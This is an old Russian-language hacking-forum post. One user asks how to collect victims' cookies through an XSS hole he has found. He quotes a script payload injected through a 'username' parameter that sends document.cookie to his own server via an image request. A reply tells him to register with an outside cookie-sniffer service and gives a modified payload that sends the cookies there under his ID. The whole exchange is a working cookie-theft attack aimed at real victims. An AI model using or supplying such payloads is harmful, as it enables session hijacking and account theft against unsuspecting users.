
21.11.2009, 11:16
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от xofffff
Я знаю вы поможете мне вы умные все )
Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве
вот примерно такая
Код:
?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <
На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif
Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif.
Помогите реализовать мои коварные планы 
Я думаю тебе надо регатся на тут,нажимаеш завести ID регаешся и
изменят на твоем запросе эту часть так:
<script>img=new Image(); img.src="http://web-defence.ru/snif/s.gif?id=ТВОЙ ИД НОМЕР&"+document.cookie;</script>
потом куки найдеш тута наберив твой ид и пасс
|
|
|